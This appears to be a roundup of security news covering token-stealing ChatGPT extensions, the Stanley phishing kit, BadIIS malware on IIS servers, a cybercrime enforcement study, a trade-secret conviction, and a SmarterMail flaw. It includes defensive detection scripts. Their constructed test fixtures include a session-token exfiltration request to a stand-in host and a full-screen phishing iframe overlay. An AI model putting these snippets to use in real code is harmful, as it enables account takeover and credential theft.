- ChatGPT prompt optimization – ChatGPT Mods (ID: mmjmcfaejolfbenlplfoihnobnggljij)
- Collapsed message – ChatGPT Mods (ID: lechagcebaneoafonkbfkljmbmaaoaec)
- Multi-Profile Management & Switching – ChatGPT Mods (ID: nhnfaiiobkpbenbbiblmgncgokeknnno)
- Search with ChatGPT – ChatGPT Mods (ID: hpcejjllhbalkcmdikecfngkepppoknd)
- ChatGPT Token counter – ChatGPT Mods (ID: hfdpdgblphooommgcjdnnmhpglleaafj)
- ChatGPT Prompt Manager, Folder, Library, Auto Send – ChatGPT Mods (ID: ioaeacncbhpmlkediaagefiegegknglc)
- ChatGPT Mods – Folder Voice Download & More Free Tools (ID: jhohjhmbiakpgedidneeloaoloadlbdj)

With artificial intelligence (AI)-related extensions becoming increasingly common in enterprise workflows, the development highlights an emerging attack surface where threat actors weaponize the trust associated with popular AI brands to deceive users into installing them. Because such tools often require an elevated execution context within the browser and have access to sensitive data, seemingly harmless extensions can become a lucrative attack vector, permitting adversaries to obtain persistent access without exploiting security flaws or resorting to other methods that may trigger security alarms. “Possession of such tokens provides account-level access equivalent to that of the user, including access to conversation history and metadata,” security researcher Natalie Zargarov said. “As a result, attackers can replicate the users’ access credentials to ChatGPT and impersonate them, allowing them to access all of the user’s ChatGPT conversations, data, or code.”

Browsers Become a Lucrative Attack Vector

The findings also coincide with the emergence of a new malware-as-a-service toolkit called Stanley that’s being peddled on a Russian cybercrime forum for between $2,000 and $6,000, and allows crooks to generate malicious Chrome browser extensions that can be used to serve phishing pages within an HTML iframe element while still showing the legitimate URL in the address bar.

Customers of the tool gain access to a C2 panel for managing victims, configuring spoofed redirects, and sending fake browser notifications. Those who are willing to spend $6,000 get a guarantee that any extension they create using the kit will pass Google’s vetting process for the Chrome Web Store. These extensions take the form of innocuous note-taking utilities to fly under the radar. But their malicious behavior is activated when the user navigates to a website of interest to the attacker, such as a bank, at which point a full-screen iframe containing the phishing page is overlaid, while leaving the browser’s URL bar intact.

This visual deception creates a defensive blind spot that can dupe even vigilant users into entering their credentials or sensitive information on the page. As of January 27, 2026, the service appears to have vanished – likely prompted by the public disclosure – but it’s very much possible that it can resurface under a different name in the future. “Stanley provides a turnkey website-spoofing operation disguised as a Chrome extension, with its premium tier promising guaranteed publication on the Chrome Web Store,” Varonis researcher Daniel Kelley noted earlier this week. “BYOD policies, SaaS-first environments, and remote work have made the browser the new endpoint.

Attackers have noticed. Malicious browser extensions are now a primary attack vector.”
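The four extension stories in this section (the 10Xprofit affiliate cluster, Symantec's clipboard and cookie stealers, the ChatGPT Mods token thieves, and Stanley's iframe overlay) share the property that the behaviour is visible in a static read of the unpacked extension: which hosts the content scripts run on, which permissions the manifest asks for, and what the scripts do with URLs, storage and outbound requests. The following is an added example, not Socket's, Symantec's, LayerX's or Varonis's analysis code, that runs those checks over constructed manifests and content scripts. The regexes are heuristics meant to rank what a reviewer reads first, not a verdict, and the host and key names in the samples are invented.

```python
"""Static triage of unpacked browser extensions for the behaviours described in this section.

Added example, not Socket's, Symantec's, LayerX's or Varonis's code. The manifests and content
scripts below are constructed; hostnames, storage keys and extension names are invented. The
regexes are heuristics to rank review order and will miss obfuscated code.
"""
import re

ECOMMERCE_HOSTS = ("amazon.", "aliexpress.", "walmart.", "bestbuy.", "shein.", "shopify.")
# affiliate tag being set or rewritten on a product URL
AFFILIATE_RX = re.compile(r"""searchParams\.set\(\s*['"]tag['"]|[?&]tag=|tag=\[\^&\]""")
# reads of places where session tokens and cookies live
SECRET_READ_RX = re.compile(r"localStorage|sessionStorage|document\.cookie|chrome\.cookies")
# outbound request to an absolute URL; group 1 is the destination host
OUTBOUND_RX = re.compile(r"""(?:fetch|navigator\.sendBeacon)\(\s*['"]https?://([^/'"]+)""")
IFRAME_RX = re.compile(r"""createElement\(\s*['"]iframe['"]""")
FULLSCREEN_RX = re.compile(r"position\s*:\s*fixed|100vw|100vh|z-?index")


def _host(pattern):
    """'*://*.amazon.com/*' -> 'amazon.com'; '<all_urls>' and '*://*/*' -> '*'."""
    m = re.match(r"[^:]+://([^/]+)/", pattern)
    if not m or m.group(1) in ("*", "*.*"):
        return "*"
    return m.group(1).lstrip("*.")


def audit_extension(manifest, sources):
    """Return finding strings for one extension (manifest dict plus {filename: js source})."""
    findings = []
    perms = set(manifest.get("permissions", []))
    if perms & {"clipboardRead", "clipboardWrite"}:
        findings.append("clipboard-permission")
    for cs in manifest.get("content_scripts", []):
        hosts = [_host(p) for p in cs.get("matches", [])]
        code = "\n".join(sources.get(f, "") for f in cs.get("js", []))
        shops = [h for h in hosts if h.startswith(ECOMMERCE_HOSTS)]
        if shops and AFFILIATE_RX.search(code):
            findings.append("affiliate-tag-rewrite:" + ",".join(shops))
        if SECRET_READ_RX.search(code):
            # a storage/cookie read is only interesting if the data can leave the matched site
            external = sorted({h for h in OUTBOUND_RX.findall(code)
                               if not any(h == x or h.endswith("." + x) for x in hosts)})
            if external:
                findings.append("secret-read-with-exfil:" + ",".join(external))
        if "*" in hosts and IFRAME_RX.search(code) and FULLSCREEN_RX.search(code):
            findings.append("fullscreen-iframe-overlay-on-all-sites")
    # Chrome's single-purpose policy: ad blocking plus link rewriting is two products in one
    if "declarativeNetRequest" in perms and any(f.startswith("affiliate") for f in findings):
        findings.append("single-purpose-mismatch:adblock+affiliate")
    return findings


# Constructed samples, one per pattern discussed above plus a benign control.
SAMPLES = {
    "shop-adblock": ({
        "manifest_version": 3, "name": "Shop Ads Blocker",
        "permissions": ["declarativeNetRequest", "storage"],
        "content_scripts": [{"matches": ["*://*.amazon.com/*", "*://*.aliexpress.com/*"], "js": ["links.js"]}],
    }, {"links.js": """
        for (const a of document.querySelectorAll('a[href*="/dp/"]')) {
          const u = new URL(a.href); u.searchParams.set('tag', 'example-20'); a.href = u.toString();
        }"""}),
    "ai-mods": ({
        "manifest_version": 3, "name": "Chat Mods", "permissions": ["storage"],
        "content_scripts": [{"matches": ["*://chatgpt.com/*"], "js": ["hook.js"]}],
    }, {"hook.js": """
        const tok = localStorage.getItem('session');   // constructed key name
        fetch('https://collector.example/ingest', {method: 'POST', body: tok});"""}),
    "overlay-kit": ({
        "manifest_version": 3, "name": "Quick Notes", "permissions": ["notifications", "storage"],
        "content_scripts": [{"matches": ["<all_urls>"], "js": ["notes.js"]}],
    }, {"notes.js": """
        if (location.hostname.endsWith('bank.example')) {
          const f = document.createElement('iframe');
          f.style.cssText = 'position:fixed;top:0;left:0;width:100vw;height:100vh;z-index:2147483647';
          f.src = 'https://lure.example/login'; document.body.append(f);
        }"""}),
    "clipboard-tab": ({"manifest_version": 3, "name": "Tab Page",
                       "permissions": ["clipboardRead", "clipboardWrite"]}, {}),
    "benign-counter": ({
        "manifest_version": 3, "name": "Word Counter",
        "content_scripts": [{"matches": ["*://chatgpt.com/*"], "js": ["count.js"]}],
    }, {"count.js": "document.title = document.body.innerText.split(/\\s+/).length + ' words';"}),
}


def audit_all(samples):
    return {name: audit_extension(m, s) for name, (m, s) in samples.items()}


if __name__ == "__main__":
    for name, findings in audit_all(SAMPLES).items():
        print(f"{name}: {findings or 'no findings'}")
```

The exfiltration check deliberately pairs a storage read with a request to a host outside the content script's own match list; a ChatGPT helper that reads local storage and only talks to chatgpt.com is unremarkable, while the same read followed by a POST elsewhere is the token-theft pattern LayerX describes. For packed extensions, unzip the .crx first and feed manifest.json and each listed script to audit_extension.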

China-Linked UAT-8099 Targets IIS Servers in Asia with BadIIS SEO Malware

Cybersecurity researchers have discovered a new campaign attributed to a China-linked threat actor known as UAT-8099 that took place between late 2025 and early 2026. The activity, discovered by Cisco Talos, has targeted vulnerable Internet Information Services (IIS) servers located across Asia, but with a specific focus on targets in Thailand and Vietnam. The scale of the campaign is currently unknown. “UAT-8099 uses web shells and PowerShell to execute scripts and deploy the GotoHTTP tool, granting the threat actor remote access to vulnerable IIS servers,” security researcher Joey Chen said in a Thursday breakdown of the campaign.

UAT-8099 was first documented by the cybersecurity company in October 2025, detailing the threat actor’s exploitation of IIS servers in India, Thailand, Vietnam, Canada, and Brazil to facilitate search engine optimization (SEO) fraud. The attacks involve infecting the servers with a known malware referred to as BadIIS. The hacking group is assessed to be of Chinese origin, with the attacks dating back to April 2025. The threat cluster also shares similarities with another BadIIS campaign codenamed WEBJACK by Finnish cybersecurity vendor WithSecure in November 2025, based on overlaps in tools, command-and-control (C2) infrastructure, and victimology footprint.

The latest campaign is focused on compromising IIS servers located in India, Pakistan, Thailand, Vietnam, and Japan, although Cisco said it observed a “distinct concentration of attacks” in Thailand and Vietnam. “While the threat actor continues to rely on web shells, SoftEther VPN, and EasyTier to control compromised IIS servers, their operational strategy has evolved significantly,” Talos explained. “First, this latest campaign marks a shift in their black hat SEO tactics toward a more specific regional focus. Second, the actor increasingly leverages red team utilities and legitimate tools to evade detection and maintain long-term persistence.” The attack chain begins with UAT-8099 gaining initial access to an IIS server, typically by either exploiting a security vulnerability or weak settings in the web server’s file upload feature.

This is followed by the threat actor initiating a series of steps to deploy malicious payloads:

- Execute discovery and reconnaissance commands to gather system information
- Deploy VPN tools and establish persistence by creating a hidden user account named “admin$”
- Drop new tools like Sharp4RemoveLog (to remove Windows event logs), CnCrypt Protect (to hide malicious files), OpenArk64 (an open-source anti-rootkit used to terminate security product processes), and GotoHTTP (for remote control of the server)
- Deploy BadIIS malware using the newly created account

With security products taking steps to flag the “admin$” account, the threat actor has added a new check to verify if the name is blocked, and if so, proceeds to create a new user account named “mysql$” to maintain access and run the BadIIS SEO fraud service without any interruption. In addition, UAT-8099 has been observed creating more hidden accounts to ensure persistence. Another notable shift revolves around the use of GotoHTTP to remotely control the infected server. The tool is launched by means of a Visual Basic Script that is downloaded by a PowerShell command that’s run following the deployment of a web shell.

The BadIIS malware deployed in the attacks comes in two new variants customized to target specific regions: while BadIIS IISHijack singles out victims in Vietnam, BadIIS asdSearchEngine is primarily aimed at targets in Thailand or users with Thai language preferences. The end goal of the malware largely remains the same: it scans incoming requests to IIS servers to check whether the visitor is a search engine crawler and, if so, redirects the crawler to an SEO fraud site.

However, if the request is from a regular user and the Accept-Language header in the request indicates Thai, it injects HTML containing a malicious JavaScript redirect into the response. Cisco Talos said it identified three distinct variants within the BadIIS asdSearchEngine cluster:

- Exclusive multiple extensions variant, which checks the file path in the request and ignores it if it contains an extension on its exclusion list, i.e., file types that would be resource intensive to process or would hamper the website’s appearance
- Load HTML templates variant, which contains an HTML template generation system to dynamically create web content by loading templates from disk or using embedded fallbacks and replacing placeholders with random data, dates, and URL-derived content
- Dynamic page extension/directory index variant, which checks whether a requested path corresponds to a dynamic page extension or a directory index

“We assess that the threat actor, UAT-8099, implemented this feature to prioritize SEO content targeting while maintaining stealth,” Talos said of the third variant. “Since SEO poisoning relies on injecting JavaScript links into pages that search engines crawl, the malware focuses on dynamic pages (e.g., default.aspx, index.php) where these injections are most effective. Furthermore, by restricting hooks to other specific file types, the malware avoids processing incompatible static files, thereby preventing the generation of suspicious server error logs.” There are also signs that the threat actor is actively refining its Linux version of BadIIS.
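A defender-side check for the two behaviours described above (crawlers redirected, Thai-language visitors served an injected redirect script), added here as an example and not code from the Talos report. The request profiles, the `Fetcher` callable, the hostnames `iis.example` and `seo-fraud.example`, and both simulated servers are constructed for the demo; against a real IIS host, `fetch` would wrap an HTTP client.

```python
"""Offline demo of a cloaking / language-conditional injection check for an IIS site.

The same URL is requested under a crawler profile, a default-language user profile
and a Thai-language user profile, and the answers are compared. Because the malware
hooks dynamic pages rather than static assets, the probe paths are dynamic pages.
All servers, hostnames and page bodies below are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Callable, Dict, List

# Request profiles replayed against one URL (User-Agent strings are illustrative).
PROFILES: Dict[str, Dict[str, str]] = {
    "crawler": {"User-Agent": "Googlebot/2.1 (+http://www.google.com/bot.html)",
                "Accept-Language": "en-US"},
    "user_en": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/124.0",
                "Accept-Language": "en-US,en;q=0.9"},
    "user_th": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/124.0",
                "Accept-Language": "th-TH,th;q=0.9,en;q=0.5"},
}

# Dynamic pages are where the text says injections are placed; probe those.
DYNAMIC_PROBE_PATHS = ["/default.aspx", "/index.php"]

# An inline <script> whose body performs a navigation.
REDIRECT_SCRIPT = re.compile(
    r"<script\b[^>]*>(?:(?!</script>).)*?"
    r"(?:window\.location|document\.location|location\.(?:href|replace|assign))",
    re.IGNORECASE | re.DOTALL,
)


@dataclass
class Response:
    status: int
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


Fetcher = Callable[[str, Dict[str, str]], Response]


def audit_url(url: str, fetch: Fetcher) -> Dict[str, object]:
    """Return findings that indicate crawler cloaking or language-conditional injection."""
    resp = {name: fetch(url, headers) for name, headers in PROFILES.items()}
    crawler, user_en, user_th = resp["crawler"], resp["user_en"], resp["user_th"]
    findings: List[str] = []

    # 1. The crawler is redirected while an ordinary visitor receives the page.
    if 300 <= crawler.status < 400 and user_en.status == 200:
        findings.append(f"crawler redirected to {crawler.headers.get('Location')!r}, "
                        f"user gets HTTP {user_en.status}")
    # 2. The Thai-language visitor receives redirect script(s) the English visitor does not.
    th_hits = len(REDIRECT_SCRIPT.findall(user_th.body))
    en_hits = len(REDIRECT_SCRIPT.findall(user_en.body))
    if th_hits > en_hits:
        findings.append(f"{th_hits - en_hits} redirect script(s) present only for Accept-Language: th")
    return {"url": url, "suspicious": bool(findings), "findings": findings}


def audit_site(base: str, fetch: Fetcher) -> List[Dict[str, object]]:
    """Audit every dynamic probe path on one host."""
    return [audit_url(base + path, fetch) for path in DYNAMIC_PROBE_PATHS]


# ---- constructed servers for the demo -------------------------------------
CLEAN_PAGE = "<html><head><title>Shop</title></head><body><h1>Welcome</h1></body></html>"


def clean_fetch(url: str, headers: Dict[str, str]) -> Response:
    """A healthy server: identical content regardless of visitor."""
    return Response(200, {}, CLEAN_PAGE)


def cloaked_fetch(url: str, headers: Dict[str, str]) -> Response:
    """Constructed server mimicking the behaviour the text attributes to BadIIS asdSearchEngine."""
    if "googlebot" in headers.get("User-Agent", "").lower():
        return Response(302, {"Location": "http://seo-fraud.example/landing"})
    if headers.get("Accept-Language", "").lower().startswith("th"):
        injected = CLEAN_PAGE.replace(
            "</body>",
            "<script>window.location.href='http://seo-fraud.example/th';</script></body>")
        return Response(200, {}, injected)
    return Response(200, {}, CLEAN_PAGE)


if __name__ == "__main__":
    for result in audit_site("http://iis.example", cloaked_fetch):
        print(result)
```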

An ELF binary artifact uploaded to VirusTotal in early October 2025 includes proxy, injector, and SEO fraud modes as before, while limiting the targeted search engines to only crawlers from Google, Microsoft Bing, and Yahoo!

Badges, Bytes and Blackmail

Behind the scenes of law enforcement in cyber: what do we know about caught cybercriminals? What brought them in, where do they come from and what was their function in the crimescape?

Introduction: One view on the scattered fight against cybercrime

The growing sophistication and diversification of cybercrime have compelled law enforcement agencies worldwide to respond through increasingly coordinated and publicized actions. Yet, despite the visibility of these operations, there remains no comprehensive overview, to our knowledge, on how law enforcement is addressing cybercrime globally.

Publicly available information is dispersed across agencies, jurisdictions, case-specific reporting (e.g., “Operation Endgame”) [1], and reporting formats, offering fragmented insights rather than a cohesive understanding of what types of crime are being targeted, what actions are taken, and who the offenders are. This results in isolated glimpses rather than a consistent global picture. Therefore, no publicly available summary exists that we are aware of that systematically aggregates information on law enforcement actions. To address this gap, this analysis introduces a systematically constructed dataset of 418 publicly announced law enforcement activities conducted between 2021 and mid-2025.

The data was collected by Orange Cyberdefense intelligence teams, which continuously monitor and assess cyber threats to identify emerging trends and the evolution of cyber incidents. In our dataset, each entry represents a verified law enforcement action collected from official announcements and media reports, then manually enriched by the Orange Cyberdefense Security Research Center team by cross-referencing each entry to include contextual and demographic details when available. A central focus lies on the type of law enforcement action taken, such as arrests, extraditions, takedowns of illicit platforms, seizures, or sanctions. The type of illicit activity was also documented by noting which type of activity the law enforcement action addressed, e.g., Hacking, Distributed Denial of Service (DDoS) Attack, IT Worker Fraud, or Cyber Extortion, and then translated into the actual criminal act behind such attacks.

Which Criminal Acts Were Addressed?

This chart shows the top 10 criminal acts most frequently addressed by law enforcement in publicly reported operations. The data reveals that Extortion (including ransomware) is the most addressed criminal act, followed closely by Installation or Distribution of Malicious Software (Malware) and Unauthorized Access or Intrusion (Hacking). Together, these three categories dominate the landscape and illustrate law enforcement’s continued focus on Cyber Extortion operations and the technical intrusions that enable them.

Other prominent criminal acts, including Unauthorized Access for Espionage (Cyber Espionage), Provision of Criminal Infrastructure (Dark Web Marketplace / Sites or Infrastructure and Hosting Services), and Deceptive Acquisition of Financial Assets (Fraud), suggest that authorities are also targeting the enablers and facilitators of cybercrime. While less frequent, offenses like Data/Information Trafficking (Selling Stolen Goods (Data)), Use of Cryptocurrency to Conceal or Facilitate Crime (Cryptocurrency Misuse), and Concealment of Criminal Proceeds via ICT (Money Laundering) reflect law enforcement’s increasing attention to the financial transactions and laundering mechanisms that underpin cyber operations.

While financial gain remains a central driver of cyber offenses [2,3,4], the lines between motivations have become increasingly blurred, in some cases shifting in response to geopolitical events, as we have continuously been reporting on in the past two years [5,6].

Activities initially framed as financially motivated can quickly take on political or ideological dimensions. These fluid boundaries illustrate how financial, political, and cognitive motives increasingly coexist, challenging traditional distinctions between criminal and ideological cyber activity.

What Actions Were Taken by Law Enforcement?

Arrests account for the largest share (29%) of law enforcement actions, illustrating law enforcement’s continued focus on individual accountability and prosecution.

Takedowns (17%) and Charges (14%) indicate a strong emphasis on disrupting operational networks and bringing offenders to justice, and together represent nearly one-third of all activity. Complementary measures such as Sentences (11%), Sanctions (7%), and Seizures (4%) show that law enforcement is addressing both criminal actors and the economic infrastructure sustaining their activities. Specifically, sanctions have shown a steady increase over recent years, reflecting a growing use of non-traditional enforcement mechanisms that bring economic and diplomatic tools into the law enforcement arsenal. Actions like investigations, wanted notices, and extraditions demonstrate cross-border cooperation and the procedural depth behind each publicized enforcement effort.

Wanted notices represent a non-coercive enforcement measure focused on public identification and pursuit. They bridge the gap between investigation and arrest by facilitating cross-border coordination and sustaining pressure on suspects. Through public attribution, they also serve a deterrent function, signalling law enforcement capability and reach even when direct apprehension is not immediately possible. If we combine the data showing the type of illicit activity addressed with the type of law enforcement action, we can see that Arrests dominate across nearly all crime types, particularly Cyber Extortion (22) and Hacking (19).

Charges and Sentences are the next most frequent responses, which demonstrates that many cases progress through the judicial process. Cyber Extortion, Malware, Hacking, and Cyber Espionage attract the most diverse range of responses (including arrests, charges, sentences, and sanctions). Takedowns are strongly linked with Dark Web sites or marketplaces [7,8,9] and malware infrastructure [10,11,12], which makes sense given the operational logic behind such actions. These operations typically involve the coordinated dismantling of online infrastructure, such as servers, domains, or communication platforms that enable criminal activity.

In the case of Dark Web Marketplaces, takedowns often include seizure of servers, arrests of administrators, and replacement of website landing pages with law enforcement banners, signalling control and deterrence. Sanctions appear primarily tied to Cyber Espionage and state-aligned operations, reflecting government-level actions rather than addressing individuals.

Who Are the Leading Institutions in Law Enforcement?

The United States’ global leadership in cyber law enforcement is demonstrated by its listing as the primary participant in nearly half of all actions (45%).

The second cluster, namely Germany, the United Kingdom, Russia, Ukraine, the Netherlands, Spain, and France, represents the core of global cyber enforcement capacity outside the U.S. Active EU member-state participation in Europol and Eurojust-facilitated operations demonstrates the Union’s emphasis on a joint, cross-border enforcement approach. The presence of Russia and Ukraine near the top of this list is noteworthy. These states are frequently targets of global law enforcement actions but also conduct their own domestic prosecutions and counter-cybercrime operations, often involving politically sensitive cases.

Entries such as International and European Countries reflect the role of multinational task forces where leadership attribution is shared. These include Europol-coordinated takedowns, Interpol operations, and Five Eyes collaborations. In some cases, law enforcement announcements did not go into detail and only described these multinational actions by European nations or International ones; whenever countries were listed on their own, they were documented as such in our data. The distribution of participating national authorities naturally reflects the same geographic patterns observed in the country-level analysis.

A study of the top 20 institutions involved in reported law enforcement actions highlights the clear dominance of U.S. agencies. The U.S. Department of Justice (DOJ) and the Federal Bureau of Investigation (FBI) lead by a wide margin, followed by private organizations, which appear as a major supporting actor in cybercrime disruption efforts.

The presence of OFAC [13] further illustrates the integration of financial and political instruments into cybercrime responses. The strong representation of private organizations among the supporting entities is particularly noteworthy. In this dataset, private organizations rank among the top three most frequently mentioned participants. Across the 169 institutions analyzed, 74 distinct private entities were identified as supporting efforts in one way or another.

This is a significant indicator of the expanding scale of public-private collaboration, which illustrates its growing importance in the fight against cybercrime.

Cybercrime Typologies Overall and Across Age Groups

The distribution across actors engaging in cybercrime activity by age group reveals notable variation in crime types across the lifespan. It is noteworthy that some age groups are represented by very few cases, limiting possible interpretation. In our dataset (n=193 offenders with verified age data), the 35-44 age group accounts for 37%, followed by 25-34 years (30%), and 18-24 years (21%), together representing nearly 90% of all identified offenders.

By contrast, younger (12-17 years) and older (55 years and above) groups each account for less than 5% of cases, making statistical analysis of those categories less meaningful. Especially in the case of 12–17-year-olds and younger, it is noteworthy that younger offenders are likely underrepresented, since minors are often shielded from prosecution and public disclosure under national legal frameworks, limiting their visibility in law enforcement reporting. Accordingly, we will focus primarily on the three core age ranges (18-24, 25-34, and 35-44 years), where offender representation is most robust. Among young adults (18-24 years), cyber offense appears highly diverse yet predominantly technically oriented.

Hacking clearly dominates this cohort (30%), followed by Selling Stolen Goods (Data) and DDoS attacks (10% each), activities that often rely on technical skill and may serve reputational or exploratory purposes rather than immediate financial gain. A secondary cluster of offenses (malware, fraud, telecom fraud, dark web marketplace activity, and cyber extortion, each at 8%) illustrates the experimental and multifaceted nature of this age group’s engagement in cybercrime. A shift becomes evident among offenders aged 25-34, where activities such as Selling Stolen Goods (Data) (21%), Cyber Extortion (14%), and Malware deployment (12%) dominate. This may indicate a move toward profit-motivated activities among actors of this age.

The trend intensifies with the 35-44 cohort, which is the largest group in this dataset and shows the greatest diversity of offense types. Within this group, Cyber Extortion (22%) is the dominant offense, followed by Malware (19%), Cyber Espionage (13%), Hacking (10%), and Money Laundering (7%). Together, these categories account for the vast majority of activities perpetrated by this age group, potentially indicating a focus on high-impact, financially and politically significant actions.

Nationality

The nationality of the offender was disclosed in 365 cases.

The dataset contains offenders from 64 distinct nationalities, suggesting a wide geographical and cultural spread. Although nationality can provide valuable insight into the geographic and sociopolitical context of offenders, it offers only a partial view in an interconnected digital landscape. Given the transnational nature of the internet and the complex, fluid identities of actors operating across jurisdictions, nationality alone cannot reliably describe the true origin or alignment of cyber operators. The distribution is heavily skewed toward a small number of countries.

Russian nationals dominate the dataset, accounting for 85 individuals (23%), followed by American (11%), Chinese (11%), Ukrainian (9%), and North Korean (5%) offenders. Together, these five nationalities represent over half of all cases (58%). Notably, the relatively high number of American offenders could be explained by jurisdictional and reporting bias: U.S. authorities conduct and publicly disclose far more cybercrime prosecutions than most other countries, making American cases more visible in open data.

Offenders of British nationality (n=17) also represent a notable share. The involvement of Western nations shows two things: the continuous efforts and transparency they offer, and at the same time, that cyber operations and related offenses are not confined to states typically implicated in cybercriminal activity. One explanation could be that we are seeing a trend toward more home-grown threat actors based in Europe, the United Kingdom, and North America, and therefore English-speaking, as a recent article points out [14]. Beyond the top five, offenders represent many other nationalities, including Dutch, French, German, Canadian, Australian, Singaporean, and more.

However, we need to note that lower numerical representation does not necessarily correspond to lower levels of activity, but may instead reflect differences in detection, exposure, or attribution.

Key Takeaways

Taken together, the findings offer a dual perspective on the fight against cybercrime that examines both the offenders and the law enforcement actors working to counter them. On the offender side, the data highlights persistent asymmetries. The overwhelming majority of identified offenders are male, reflecting trends widely observed in cybercrime research.

Age data indicate that cyber offense is concentrated among adults in their mid-20s to mid-40s, with comparatively few cases involving younger or older individuals. Offense types vary across these age ranges, with younger offenders often engaged in technical and exploratory activities like hacking and DDoS attacks, while older cohorts were more frequently involved in profit-driven or complex operations such as cyber extortion, data theft, and malware deployment. Nationality data shows a strong concentration within a few groups, with Russian nationals alone accounting for nearly a quarter of cases. While nationality cannot fully describe the origins of cybercrime in an interconnected digital space, it provides useful insight into the sociopolitical and regional contexts in which offenders operate.

The types of criminal acts most frequently prosecuted, such as cyber-enabled financial crime, extortion and ransomware, and unauthorized access, suggest that most cybercriminal activities remain primarily financially motivated. The analysis of 418 publicly reported law enforcement actions (2021-mid-2025) shows an increasingly active and diversified global law enforcement response. The U.S. Department of Justice and FBI are the most visible, joined by leading European agencies like Europol, Germany’s BKA, and authorities in the Netherlands and France.

Participation from Ukraine, Russia, Australia, Singapore, Japan, and Nigeria illustrates how enforcement has become truly international. Private organizations also play a critical role: seventy-four private companies supported operations in some capacity, showing that public-private partnerships are now essential to ongoing disruption efforts. This is just an excerpt of the coverage on current topics in cyber security. For the full story and in-depth articles on the use and abuse of Generative AI, post-quantum cryptography, Vulnerability management and Cyber Extortion as well as CyberSOC statistics and security predictions, you should check out the Security Navigator 2026!

Head over to the download page and get a copy.

[1] Europol – Operation Endgame
[2] Verizon – 2025 DBIR Executive Summary
[3] FBI IC3 – 2024 Internet Crime Report
[4] ENISA – Threat Landscape 2024
[5] Orange Cyberdefense – Security Navigator 2024
[6] Orange Cyberdefense – Security Navigator 2025
[7] U.S. DOJ – Criminal Marketplace Disruption
[8] Europol – Coalition Takedown of Criminal Platform
[9] Dutch Police – Bohemia/Cannabia Dark Web Takedown
[10] Europol – FluBot Malware Takedown
[11] Germany BKA – Darknet Kingdom Market
[12] Europol – Largest-Ever Botnet Operation
[13] U.S. Treasury – Office of Foreign Assets Control (OFAC)
[14] Binding Hook – UK Response to Cyber Criminals

Note: This article was expertly written and contributed by Diana Selck-Paulsson, Senior Security Researcher at Orange Cyberdefense.


Ex-Google Engineer Convicted for Stealing AI Secrets for China Startup

A former Google engineer accused of stealing thousands of the company’s confidential documents to build a startup in China has been convicted in the U.S., the Department of Justice (DoJ) announced Thursday. Linwei Ding (aka Leon Ding), 38, was convicted by a federal jury on seven counts of economic espionage and seven counts of theft of trade secrets for taking over 2,000 documents containing the tech giant’s trade secrets related to artificial intelligence (AI) technology for the benefit of the People’s Republic of China (PRC). “Silicon Valley is at the forefront of artificial intelligence innovation, pioneering transformative work that drives economic growth and strengthens our national security,” said U.S. Attorney Craig H. Missakian. “We will vigorously protect American intellectual capital from foreign interests that seek to gain an unfair competitive advantage while putting our national security at risk.” Ding was indicted in March 2024 for transferring sensitive proprietary information from Google’s network to his personal Google Cloud account. The stolen documents included details about the company’s supercomputing data center infrastructure used for running AI models, the Cluster Management System (CMS) software for managing the data centers, and the AI models and applications they supported. Specifically, the trade secrets pertained to:

- Architecture and functionality of Google’s custom Tensor Processing Unit chips and systems, and Google’s Graphics Processing Unit systems
- Software that allows the chips to communicate and execute tasks
- Software that orchestrates thousands of chips into a supercomputer capable of training and executing cutting-edge AI workloads
- Custom-designed SmartNIC, a type of network interface card used to facilitate high-speed communication within Google’s AI supercomputers and cloud networking products

The theft took place between May 2022 and April 2023.

Ding, who joined Google in 2019, is said to have affiliated himself with two tech companies based in China, including a startup named Shanghai Zhisuan Technologies Co., which he founded in 2023 while still employed by Google. Ding downloaded the documents to his computer in December 2023, less than two weeks before resigning from Google. “Around June 2022, Ding was in discussions to be the Chief Technology Officer for an early-stage technology company based in the PRC; by early 2023, Ding was in the process of founding his own technology company in the PRC focused on AI and machine learning and was acting as the company’s CEO,” the DoJ said. The 2024 indictment also alleged that the defendant took a number of deceitful steps to cover up the theft of trade secrets, including copying the data from Google source files into the Apple Notes application on his company-provided MacBook and then converting the notes to PDF files before uploading them to his Google account.

Furthermore, prosecutors accused Ding of asking another Google employee to use his company-issued access badge to scan into the entrance of a Google building and give the impression that he was working from the office when, in fact, he was in China. The scheme unravelled in late 2023 when Google learned that he had given a public presentation in China to potential investors about his startup. According to Courthouse News, Ding’s attorney Grant Fondo reportedly argued that Google did not do enough to protect the information, and that the documents in question could not have contained trade secrets because they were available to thousands of employees. “Google chose openness over security,” Fondo said.

In February 2025, Ding was charged with economic espionage, with the superseding indictment also claiming he applied to a Shanghai-based “talent” program sponsored by Beijing. The indictment also called out these talent programs for encouraging individuals engaged in research and development outside the country to come to China to contribute to the nation’s economic and technological growth. “Ding’s application for this talent plan stated that he planned to ‘help China to have computing power infrastructure capabilities that are on par with the international level,’” the DoJ said. “The evidence at trial also showed that Ding intended to benefit two entities controlled by the government of China by assisting with the development of an AI supercomputer and collaborating on the research and development of custom machine learning chips.” Ding is scheduled to appear at a status conference on February 3, 2026.

He faces a maximum sentence of 10 years in prison for each count of theft of trade secrets and 15 years in prison for each economic espionage count.

SmarterMail Fixes Critical Unauthenticated RCE Flaw with CVSS 9.3 Score

SmarterTools has addressed two more security flaws in SmarterMail email software, including one critical security flaw that could result in arbitrary code execution. The vulnerability, tracked as CVE-2026-24423 , carries a CVSS score of 9.3 out of 10.0. “SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method,” according to a description of the flaw in CVE.org. “The attacker could point the SmarterMail to the malicious HTTP server, which serves the malicious OS [operating system] command.

This command will be executed by the vulnerable application.” watchTowr researchers Sina Kheirkhah and Piotr Bazydlo, CODE WHITE GmbH’s Markus Wulftange, and VulnCheck’s Cale Black have been credited with discovering and reporting the vulnerability. The security hole has been addressed in Build 9511, released on January 15, 2026. The same build also patches another critical flaw (CVE-2026-23760, CVSS score: 9.3) that has since come under active exploitation in the wild. In addition, SmarterTools has shipped fixes to plug a medium-severity security vulnerability (CVE-2026-25067, CVSS score: 6.9) that could allow an attacker to facilitate NTLM relay attacks and unauthorized network authentication.

